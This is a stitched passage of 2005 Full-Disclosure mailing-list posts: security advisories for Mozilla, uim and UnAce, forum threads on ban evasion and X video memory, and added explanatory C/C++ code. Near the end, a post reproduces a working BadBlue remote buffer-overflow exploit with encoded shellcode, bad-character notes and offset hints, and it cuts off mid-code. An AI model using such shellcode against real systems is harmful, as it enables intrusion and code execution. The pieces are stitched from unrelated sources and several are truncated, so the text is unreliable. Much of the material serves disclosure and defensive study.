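            std::isxdigit((unsigned char)in[i + 2])) {
            out += static_cast<char>(std::stoi(in.substr(i + 1, 2), nullptr, 16));
            i += 2;
            continue;
        }
        out += '=';                                   // lone "=", keep as-is
    }
    return out;
}

// Naive filter of the kind the post asks about: a case-insensitive search for
// an "<html" or "<script" opening tag in whatever bytes it is handed.
bool ContainsHtmlTag(const std::string& body) {
    std::string lower;
    for (char c : body) lower += static_cast<char>(std::tolower((unsigned char)c));
    return lower.find("<html") != std::string::npos ||
           lower.find("<script") != std::string::npos;
}

// Constructed sample modelled on q2.txt from the post: a text/html MIME part
// whose body is quoted-printable, so no literal '<' appears in the bytes.
const std::string kSample =
    "Content-Type: text/html; charset=us-ascii\r\n"
    "Content-Transfer-Encoding: quoted-printable\r\n"
    "\r\n"
    "=3CHTML=3E=3CHEAD=3E=3CTITLE=3ETest message no. 3=3C/TITLE=3E=3C/HEAD=3E\r\n"
    "=3CBODY=3E=3CH1=3EThis is test message no. 3=3C/H1=3E=3C/BODY=3E=3C/HTML=3E\r\n";

// Splits a MIME part at the blank line and returns the body decoded according
// to its Content-Transfer-Encoding (only quoted-printable is handled here;
// 7bit/8bit/binary pass through unchanged).
std::string DecodedBody(const std::string& part) {
    std::size_t split = part.find("\r\n\r\n");
    if (split == std::string::npos) return part;
    std::string headers = part.substr(0, split);
    std::string body = part.substr(split + 4);
    std::string lower;
    for (char c : headers) lower += static_cast<char>(std::tolower((unsigned char)c));
    if (lower.find("content-transfer-encoding: quoted-printable") != std::string::npos)
        return DecodeQuotedPrintable(body);
    return body;
}

// Raw bytes: the filter sees no tag. Decoded body: the same filter sees <HTML>.
bool RawFilterSeesTag()     { return ContainsHtmlTag(kSample); }
bool DecodedFilterSeesTag() { return ContainsHtmlTag(DecodedBody(kSample)); }
```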
Re: [Full-Disclosure] Xfree86 video buffering?
On Wednesday 23 February 2005 23:20, defiance wrote:

> Seriously though, I think this has to do with stuff getting left in the video memory. I don't think X flushes it properly.

I already saw this problem switching from ctrl+alt+F7 to ctrl+alt+F8 from a F7 root X session to a F8 user X session, where the user session sees the last root screen. This seems to prove this is an X behaviour problem; reboot or not, the problem is here.

--
regards
William Waisse
http://neoskills.com
http://waisse.org
[Full-Disclosure] Safe Run As
Safe Run As - keylogger protection

This tool is created to protect administrative passwords against keyloggers. Administrator's passwords are stored in an AES-encrypted file on removable storage (flash drive, floppy). When you need to use the run as command, you launch saferunas.hta and provide the username and encryption key. Passwords are decrypted and cmd.exe is launched with the selected user's privileges. The Edit.hta tool can be used to create and modify the file with encrypted passwords.

Attention!
- This tool doesn't protect against smart malware which can copy the password file and steal the encryption key.
- You can't choose the program to run. Coming soon.
- In this version the password entered is used as the AES key directly. This is a bad idea. A PKCS#5 version is coming soon.
- Attention - when you run a GUI application as a high privileged user, you are vulnerable to Shatter-style attacks (see shatter vbs for example).

http://www.security.nnov.ru/soft/srunas/

(c)oded by [EMAIL PROTECTED]
[Full-Disclosure] iDEFENSE Security Advisory 02.28.05: Mozilla Firefox and Mozilla Browser Out Of Memory Heap Corruption Design Error
Mozilla Firefox and Mozilla Browser Out Of Memory Heap Corruption Design Error

iDEFENSE Security Advisory 02.28.05
www.idefense.com/application/poi/display?id=200&type=vulnerabilities
February 28, 2005

I. BACKGROUND

Mozilla is an open-source web browser, designed for standards compliance, performance and portability. Further information about the browser is available at:

http://www.mozilla.org

II. DESCRIPTION

Remote exploitation of a design error in Mozilla 1.7.3 and Firefox 1.0 may allow an attacker to cause heap corruption, resulting in execution of arbitrary code.

The vulnerability specifically exists in string handling functions, such as nsCSubstring::Append, which rely on functions in the file mozilla/xpcom/string/src/nsTSubstring.cpp. Certain functions, such as nsTSubstring_CharT::Replace(), fail to check the return value of functions which resize the string.

xpcom/string/src/nsTSubstring.cpp:

    [1] size_type length = tuple.Length();
        cutStart = PR_MIN(cutStart, Length());
    [2] ReplacePrep(cutStart, cutLength, length);
    [3] if (length > 0)
            tuple.WriteTo(mData + cutStart, length);

At [1], length is set to the length of the string to be copied, which is then passed to ReplacePrep() at [2]. If the reallocation performed by this function fails, it sets mData to a fixed address:

    mData = NS_CONST_CAST(char_type*, char_traits::sEmptyBuffer);
    mLength = 0;

The value of sEmptyBuffer is set in xpcom/string/src/nsSubstring.cpp:

    static const PRUnichar gNullChar = 0;
    const char* nsCharTraits<char>::sEmptyBuffer = (const char*) &gNullChar;

As the return value is not checked, if the function fails mData is pointing at a known memory location. By causing memory to be consumed until an out of memory condition occurs, and controlling the value of the string to append, it is possible at [3] to cause arbitrary data to be placed in a known location, allowing execution of arbitrary code.

This vulnerability would rely on both knowing the version of the browser, which could be obtained from the User-Agent string passed to a malicious server, and being able to cause memory exhaustion. It may be possible to cause memory exhaustion remotely either by sending a large amount of data to the client in the headers, which would require a large amount of bandwidth, or by using compression to reduce the amount of data that needs to be sent to the client, either via a server module like the Apache httpd mod_deflate, or a file such as a ZIP file referenced by a jar: URI. It also may be possible to use JavaScript to allocate enough memory to trigger this vulnerability. As this vulnerability is triggered in an out of memory condition, it may be easier to exploit on systems which have restricted the amount of memory a user or process may use.

III. ANALYSIS

Remote exploitation of this vulnerability may allow execution of arbitrary code with the privileges of the logged-in user. A failed exploitation attempt may result in the browser crashing.

IV. DETECTION

iDEFENSE Labs have confirmed The Mozilla Organization's Mozilla 1.7.1 and 1.7.3, as well as Firefox 0.10.1, are vulnerable to this issue. A check on the source code for Firefox 1.0 suggests it is also vulnerable. It is suspected that all previous versions of both browsers are vulnerable.

V. WORKAROUND

iDEFENSE is currently unaware of any effective workarounds for this vulnerability.

VI. VENDOR RESPONSE

Vendor advisory:
http://www.mozilla.org/security/announce/mfsa2005-18.html

Raw bug report:
https://bugzilla.mozilla.org/show_bug.cgi?id=277549

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the names CAN-2005-0255 to these issues. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

02/09/2005 Initial vendor notification
02/09/2005 Initial vendor response
02/28/2005 Coordinated public disclosure

IX. CREDIT

Gaël Delalleau is credited with discovering this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use
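An added example (not iDEFENSE's or Mozilla's code) that models the Replace() pattern in the advisory: ReplacePrep() may fail to grow the buffer and then resets the string to a shared static empty buffer, and the unchecked caller writes through mData anyway. ModelString, its simulated allocation limit and the mutable stand-in for sEmptyBuffer are assumptions of the model; it shows the unchecked write landing at the fixed empty-buffer address after a failed ReplacePrep(), and the return-value-checking form refusing the write.

```cpp
// Added example, not iDEFENSE's or Mozilla's code: a small model of the
// nsTSubstring::Replace() pattern from the advisory. ReplaceUnchecked() drops
// the result of ReplacePrep() as the vulnerable code did; ReplaceChecked() is
// the hardened form. Allocation failure is simulated with a byte limit.
#include <cstddef>
#include <cstring>
#include <string>

// Stand-in for nsCharTraits<char>::sEmptyBuffer. The real one is a single const
// character; this mutable, oversized array lets the stray write be observed safely.
static char sEmptyBuffer[64] = {0};

class ModelString {
public:
    explicit ModelString(std::size_t allocLimit)
        : mData(sEmptyBuffer), mLength(0), mAllocLimit(allocLimit) {}
    ~ModelString() { if (mData != sEmptyBuffer) delete[] mData; }

    std::size_t Length() const { return mLength; }
    const char* Data() const { return mData; }
    bool PointsAtEmptyBuffer() const { return mData == sEmptyBuffer; }

    // Vulnerable form ([1]-[3] in the advisory): cutStart is clamped to the old
    // length, ReplacePrep()'s result is ignored, and the write goes through mData
    // even though it may now point at sEmptyBuffer.
    void ReplaceUnchecked(std::size_t cutStart, std::size_t cutLength,
                          const std::string& tuple) {
        std::size_t length = tuple.size();
        cutStart = cutStart < mLength ? cutStart : mLength;
        ReplacePrep(cutStart, cutLength, length);
        if (length > 0)
            std::memcpy(mData + cutStart, tuple.data(), length);
    }

    // Hardened form: a failed ReplacePrep() is a failed Replace(); never write
    // through a pointer that was just reset.
    bool ReplaceChecked(std::size_t cutStart, std::size_t cutLength,
                        const std::string& tuple) {
        std::size_t length = tuple.size();
        cutStart = cutStart < mLength ? cutStart : mLength;
        if (!ReplacePrep(cutStart, cutLength, length))
            return false;
        if (length > 0)
            std::memcpy(mData + cutStart, tuple.data(), length);
        return true;
    }

private:
    // Makes room so cutLength bytes at cutStart can be replaced by fragLength
    // bytes. On simulated allocation failure it does what the advisory describes:
    // mData = sEmptyBuffer (a known, fixed address), mLength = 0, and reports false.
    bool ReplacePrep(std::size_t cutStart, std::size_t cutLength, std::size_t fragLength) {
        if (cutLength > mLength - cutStart) cutLength = mLength - cutStart;
        std::size_t newLength = mLength - cutLength + fragLength;
        if (newLength > mAllocLimit) {
            if (mData != sEmptyBuffer) delete[] mData;
            mData = sEmptyBuffer;
            mLength = 0;
            return false;
        }
        char* fresh = new char[newLength + 1];   // this model always reallocates
        std::memcpy(fresh, mData, cutStart);
        std::memcpy(fresh + cutStart + fragLength, mData + cutStart + cutLength,
                    mLength - cutStart - cutLength);
        if (mData != sEmptyBuffer) delete[] mData;
        mData = fresh;
        mLength = newLength;
        mData[mLength] = '\0';
        return true;
    }

    char* mData;
    std::size_t mLength;
    std::size_t mAllocLimit;
};

// Normal operation: replace "world" with "there" inside "hello world".
std::string ReplaceMiddle() {
    ModelString s(64);
    s.ReplaceChecked(0, 0, "hello world");
    s.ReplaceChecked(6, 5, "there");
    return std::string(s.Data(), s.Length());
}

// With an 8-byte limit the append fails; the unchecked path still copies the
// 10 tuple bytes to sEmptyBuffer + 5, the fixed address the advisory warns about.
bool UncheckedWriteLandsInEmptyBuffer() {
    std::memset(sEmptyBuffer, 0, sizeof sEmptyBuffer);
    ModelString s(8);
    s.ReplaceChecked(0, 0, "hello");
    s.ReplaceUnchecked(s.Length(), 0, "WORLD!!!!!");
    return s.PointsAtEmptyBuffer() && std::memcmp(sEmptyBuffer + 5, "WORLD!!!!!", 10) == 0;
}

// Same failure on the checked path: Replace() reports it and nothing is written.
bool CheckedWriteRefused() {
    std::memset(sEmptyBuffer, 0, sizeof sEmptyBuffer);
    ModelString s(8);
    s.ReplaceChecked(0, 0, "hello");
    bool ok = s.ReplaceChecked(s.Length(), 0, "WORLD!!!!!");
    return !ok && s.PointsAtEmptyBuffer() && sEmptyBuffer[5] == 0;
}
```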
Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(evgpsc verify reciept please)
Nope, but this should provide hours of amusement. Go to Google and type in or copy from here:

orkut +google +profile.aspx

Interesting...

r/
Dan

Sometimes MSN E-mail will indicate that the message failed to be delivered. Please resend when you get those; it does not mean that the mail box is bad, merely that MSN mail is overworked at the time.

From: David Chastain [EMAIL PROTECTED]
To: Ankush Kapoor [EMAIL PROTECTED]
CC: full-disclosure@lists.netsys.com
Subject: Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(evgpsc verify reciept please)
Date: Mon, 28 Feb 2005 05:38:24 -0800

> Is anyone a part of Orkut or know someone who is?
>
> On Saturday, February 26, 2005, at 03:17PM, Ankush Kapoor [EMAIL PROTECTED] wrote:
>
>> Combine Google's search capabilities with Orkut, and suddenly they know so much about so many people and how they are related. Connect keyhole to that which they recently bought, and voila, it could be putting spy agencies to shame after a while!
>>
>> regards
>> Ankush Kapoor
>>
>> On Sat, 26 Feb 2005 10:40:32 -0800, Steve Kudlak [EMAIL PROTECTED] wrote:
>>
>>> One sort of prediction does not say too much, but Google has a lot of power because they have a lot of information. Interesting, it was very interesting to look at, although a lot of it was the power of the traditional media, because I could have and did ignore most of the Swifties after an initial look through their tactics, which were traditional media stuff, but most people hold that somehow is real fact and truth. The interesting question is how did you take the freeform approach of the zeitgeist list and get from that to an actual who was going to win the election?
>>>
>>> Have Fun,
>>> Sends Steve
>>>
>>> P.S. My friends in Ohio said it was very difficult to avoid the Swifties stuff if you looked at any public media. The interesting thing was the whole way I heard very little out here on the West Coast from the Bush Campaign and the Swifties, but in Ohio friends got flooded daily with saturation media.
>>>
>>> N.B. I post this to full-dis and other places because it does involve disclosure of techniques about how people accomplish things in the world using information tools.
>>>
>>> bob wireless internet evdo wifi hotspot guy wrote:
>>>
>>>> Google has all kinds of info... they are probably the most powerful entity on this planet... I looked up Google's Zeitgeist and the ratio of Kerry vs. Bush searches BEFORE the election was the margin by which Bush WON... PREDICTIVE??? Absolutely.
>>>>
>>>> X Robert Kim, Wireless Internet Wifi Hotspot Advisor
>>>> http://evdo-coverage.com
>>>> http://wireless-internet-broadband-service.com
>>>> https://evdo.sslpowered.com/wifi-hotspot-router.htm
>>>> 2611 S Pacific Coast Highway 101 Cardiff by the Sea CA 92007 : 206 984 0880
>>>> Wireless Internet Service Is ONLY Broadband with Broadband Customer Service(tm)
>>>> OUR QUEST: To Kill the Cubicle! (SM)
>>>> ---Shalo -;-)
>>>>
>>>> ----- Original Message -----
>>>> From: Nancy Kramer [EMAIL PROTECTED]
>>>> To: [EMAIL PROTECTED]; full-disclosure@lists.netsys.com
>>>> Sent: Friday, February 25, 2005 12:46 PM
>>>> Subject: Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation
>>>>
>>>>> If you run the Google Toolbar they do know where you have been surfing on the web. They do record it. That's how you pay for the Toolbar. Your theory sounds correct to me.
>>>>>
>>>>> Regards,
>>>>> Nancy Kramer
[Full-Disclosure] [ GLSA 200502-31 ] uim: Privilege escalation vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200502-31
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: uim: Privilege escalation vulnerability
      Date: February 28, 2005
      Bugs: #82678
        ID: 200502-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Under certain conditions, applications linked against uim suffer from a privilege escalation vulnerability.

Background
==========

uim is a simple, secure and flexible input method library.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  app-i18n/uim       < 0.4.5.1                           >= 0.4.5.1

Description
===========

Takumi Asaki discovered that uim insufficiently checks environment variables. setuid/setgid applications linked against libuim could end up executing arbitrary code. This vulnerability only affects immodule-enabled Qt (if you build Qt 3.3.2 or later versions with USE=immqt or USE=immqt-bc).

Impact
======

A malicious local user could exploit this vulnerability to execute arbitrary code with escalated privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All uim users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-i18n/uim-0.4.5.1"

References
==========

  [ 1 ] CAN-2005-0503
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0503
  [ 2 ] uim announcement
        http://lists.freedesktop.org/archives/uim/2005-February/000996.html

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200502-31.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
Re: [Full-Disclosure] client - server
> Which information can a server get about a client running M$ Windows XP? I cannot access a website because I have been banned and I'd like to understand how they recognize me for sure.

All sorts of stuff. Visit browserspy (http://gemal.dk/browserspy/) for a bunch of tests. Java is one excellent way to steal the goods (and many browserspy tests use that). The 'short' answer is, however, probably a simple IP check.

> I mean:
> - a simple ip check doesn't work with dynamic addresses...
> - cookies can be deleted
> - computer name can be changed
> - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac )

MAC address? That's not visible past the DSLAM. As for dynamic addresses, have you kept track? I have (supposed) dynamic addresses at home and it's not changed in over a year.

You should dump the DSL modem and get a conventional ethernet one. Then change the MAC on your ethernet card at will (this will get you new addresses). There probably is a way to access the innards of the USB one but you'd probably have to take it apart and locate the serial port.

~Mike.

> Anything else ? How the hell do they recognize me ?
>
> Matteo Giannone
Re: [Full-Disclosure] client - server
I have made all tests on that website: none revealing information that can recognize me. I mean: if Mozilla would send its SERIAL NUMBER (if it exists), that is a way to identify my own copy of Mozilla.

> All sorts of stuff. Visit browserspy (http://gemal.dk/browserspy/) for a bunch of tests. Java is one excellent way to steal the goods (and many browserspy tests use that). The 'short' answer is, however, probably a simple IP check.
>
> ~Mike.

Matteo Giannone
[Full-Disclosure] [ GLSA 200502-32 ] UnAce: Buffer overflow and directory traversal vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200502-32
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: UnAce: Buffer overflow and directory traversal vulnerabilities
      Date: February 28, 2005
      Bugs: #81958
        ID: 200502-32

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

UnAce is vulnerable to several buffer overflow and directory traversal attacks.

Background
==========

UnAce is a utility to extract, view and test the contents of an ACE archive.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  app-arch/unace     <= 1.2b                           *>= 1.2b-r1
     app-arch/unace     <= 2.0                            *>= 1.2b-r1

Description
===========

Ulf Harnhammar discovered that UnAce suffers from buffer overflows when testing, unpacking or listing specially crafted ACE archives (CAN-2005-0160). He also found out that UnAce is vulnerable to directory traversal attacks, if an archive contains "../" sequences or absolute filenames (CAN-2005-0161).

Impact
======

An attacker could exploit the buffer overflows to execute malicious code or the directory traversals to overwrite arbitrary files.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All UnAce users should upgrade to the latest available 1.2 version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-arch/unace-1.2b-r1"

References
==========

  [ 1 ] CAN-2005-0160
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0160
  [ 2 ] CAN-2005-0161
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0161

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200502-32.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
Re: [Full-Disclosure] client - server
It is impossible that they banned a block of addresses of my ISP, because that is a webserver where you play games: most of the people playing games there use my same ISP and also live near me. I am sure that my IP address changes in a couple of hours after disconnections. I deleted cookies, changed computer name, used different browsers. ActiveX controls are disabled by default on Internet Explorer. I really don't understand how they can ban me.

Are you all sure they cannot know my MAC address? I think they know it when I connect to the server (I remember something of TCP/IP stack and encapsulation/decapsulation).

> Most likely they might have blocked the entire pool of IP belonging to your ISP; try to visit the website with a proxy server
>
> --
> Gautam R. Singh

Matteo Giannone
Re: [Full-Disclosure] client - server
> Are you all sure they cannot know my MAC address? I think they know it when I connect to the server (i remember something of TCP/IP stack and encapsulation/decapsulation)

Only if some 3rd party application (like the game) is sending it (this is how Xbox modchip users get nicked... also using a similar trick involving the HDD serial number). If you're banned with this game (but nothing else)... perhaps it's something involving the game's serial number? Accounts on Doom servers (and the like) have been banned in the past for a variety of reasons.

If this is plain-Jane HTTP, try using an anonymous proxy server to hide your address (get one from www.multiproxy.org).

MAC addresses don't make it past any layer 2 device (a DSLAM is basically a fancy switch) unless you're doing something like DLSw (which, being a residential DSL subscriber, you're not).

~Mike.
Re: [Full-Disclosure] client - server
A MAC address can be queried on a Windows box via the registry, if you have access. This can be done with [null] sessions and NetBIOS. So, depending on security, connectivity, access permissions, etc., it may be possible to obtain this information.

On Mon, 28 Feb 2005 11:18:49 -0500, Michael Holstein [EMAIL PROTECTED] wrote:

> MAC address? That's not visible past the DSLAM. As for dynamic addresses, have you kept track? I have (supposed) dynamic addresses at home and it's not changed in over a year.
>
> ~Mike.

--
ME2
my home: http://www.santeriasys.net/
my photos: http://mespinola.blogspot.com/
Re: [Full-Disclosure] client - server
What is the game? Perhaps they are blocking you by an internal User/Player ID number. I know that's how effective blocking is done in CounterStrike:Source.

On Mon, 28 Feb 2005 17:49:01 +0100, Matteo Giannone [EMAIL PROTECTED] wrote:

> It is impossible that they banned a block of addresses of my ISP, because that is a webserver where you play games: most of the people playing games there use my same ISP and also live near me. I am sure that my IP address changes in a couple of hours after disconnections. I deleted cookies, changed computer name, used different browsers. ActiveX controls are disabled by default on Internet Explorer. I really don't understand how they can ban me.

--
ME2
my home: http://www.santeriasys.net/
my photos: http://mespinola.blogspot.com/
Re: [Full-Disclosure] Xfree86 video buffering?
On Sun, 27 Feb 2005 01:19:34 +0100, William Waisse said:

> I already saw this problem switching from ctrl+alt+F7 to ctrl+alt+F8 from a F7 root X session to a F8 user X session, where the user session sees the last root screen.

Umm... what's stopping the user from looking at the F7 root session and getting the information *before* you hit alt-F8? If the user is there in time to see the vt7 session info before the X server wakes up and draws the vt8 pixels, they were probably in visual range before you did it too.

Unless of course, ctl-alt-F8 is really your "the boss is coming, hide the pr0n" key sequence, in which case you *do* have a problem, but it's not the X server. :)
[VulnDiscuss] Re: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
next time then publish both at the same time, because coded or not, because of the timeline the exploit has been brought in first by hat-squad, sorry ;-)

class101
Jr. Researcher
Hat-Squad.com

- Original Message -
From: Andres Tarasco
To: '[EMAIL PROTECTED]'
Cc: 'full-disclosure@lists.netsys.com, [EMAIL PROTECTED]'
Sent: Monday, February 28, 2005 11:18 AM
Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)

Hole History:
26-2-2005: BOF flaw published by Andres Tarasco of sia.es
27-2-2002: Hat-Squad.com releases an exploit
28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs.

That's simply not true. Miguel Tarasco developed the first functional exploit for this vulnerability. This exploit was not published before because of the disclosure timeline.

regards

On Mon, 28 Feb 2005 09:42:11 +0100, class 101 [EMAIL PROTECTED] wrote:

(reposting again with the hole history)

Andres Tarasco of sia.es has published yesterday a security hole affecting BadBlue 2.5 and below.
http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html

Hat-Squad.com brought you a fresh exploit. The exploit and BadBlue v2.5 are both available at class101.org for your exploitation practices, njoy :)

/*
BadBlue, Easy File Sharing Remote BOverflow

Homepage:          badblue.com
Affected version:  v2.5 (2.60 and below not tested)
Patched version:   v2.61
Link:              badblue.com/bbs98.exe
Date:              27 February 2005
Application Risk:  Severely High
Internet Risk:     Low
Discovery Credits: Andres Tarasco (atarasco _at_ sia.es)
Exploit Credits :  class101 metasploit.com

Hole History:
26-2-2005: BOF flaw published by Andres Tarasco of sia.es
27-2-2002: Hat-Squad.com releases an exploit
28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs.

Notes:
-6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by BadBlue
-using offsets from ext.dll, universal.
-use findjmp2 to quick search into ext.dll to see if the offsets change in the other BadBlue versions below 2.5
-if you need the v2.5 for exploitation practices, get it on class101.org
-rename to .c for nux, haven't tested this one but it should work fine.

Greet: Nima Majidi, Behrang Fouladi, Pejman, Hat-Squad.com, metasploit.com, A^C^E of addict3d.org, str0ke of milw0rm.com and my homy class101.org :
*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]= /*XORed, I kiss metasploit.com because they are what means elite!*/
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";

char payload[1024];
char
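The notes above list six bytes BadBlue mangles, which is why the payload is XOR-encoded. As an added example (not part of class101's post or the Hat-Squad exploit), here is the check a practitioner runs before sending anything at the target: scan a byte buffer for those values and report the first offending offset. The decoder-stub bytes are the first 32 bytes quoted from the post; the second, unencoded sample is constructed here so the scan has something to find.

```c
#include <stddef.h>
#include <stdio.h>

/* The six bytes the post says BadBlue mangles (NUL, '&', ' ', LF, 0x8C, '<'). */
const unsigned char BADBLUE_BADCHARS[] = { 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C };
const size_t BADBLUE_NBAD = sizeof BADBLUE_BADCHARS;

/* First 32 bytes of the XOR decoder stub exactly as posted above. */
const unsigned char POSTED_STUB[] = {
    0x29,0xc9,0x83,0xe9,0xaf,0xe8,0xff,0xff,0xff,0xff,0xc0,0x5e,0x81,0x76,0x0e,0x03,
    0x7b,0x5b,0x13,0x83,0xee,0xfc,0xe2,0xf4,0xff,0x11,0xb0,0x5c,0xeb,0x82,0xa4,0xec
};

/* Constructed, unencoded sample (not from the post): a space at offset 4 and a
 * NUL at offset 7, both of which BadBlue would corrupt. */
const unsigned char RAW_SAMPLE[] = { 0x31,0xc0,0x68,0x2f,0x20,0x73,0x68,0x00 };

/* Offset of the first byte in buf that appears in bad[], or -1 if clean.
 * Takes an explicit length: a payload containing 0x00 cannot be measured with
 * strlen(), which is one reason 0x00 is on every bad-char list. */
long first_badchar(const unsigned char *buf, size_t len,
                   const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return (long)i;
    return -1;
}

/* Total number of offending bytes, for a summary line. */
size_t count_badchars(const unsigned char *buf, size_t len,
                      const unsigned char *bad, size_t nbad)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) { n++; break; }
    return n;
}

static void report(const char *name, const unsigned char *buf, size_t len)
{
    long off = first_badchar(buf, len, BADBLUE_BADCHARS, BADBLUE_NBAD);
    if (off < 0)
        printf("%s: clean (%zu bytes)\n", name, len);
    else
        printf("%s: %zu bad byte(s), first is 0x%02x at offset %ld\n", name,
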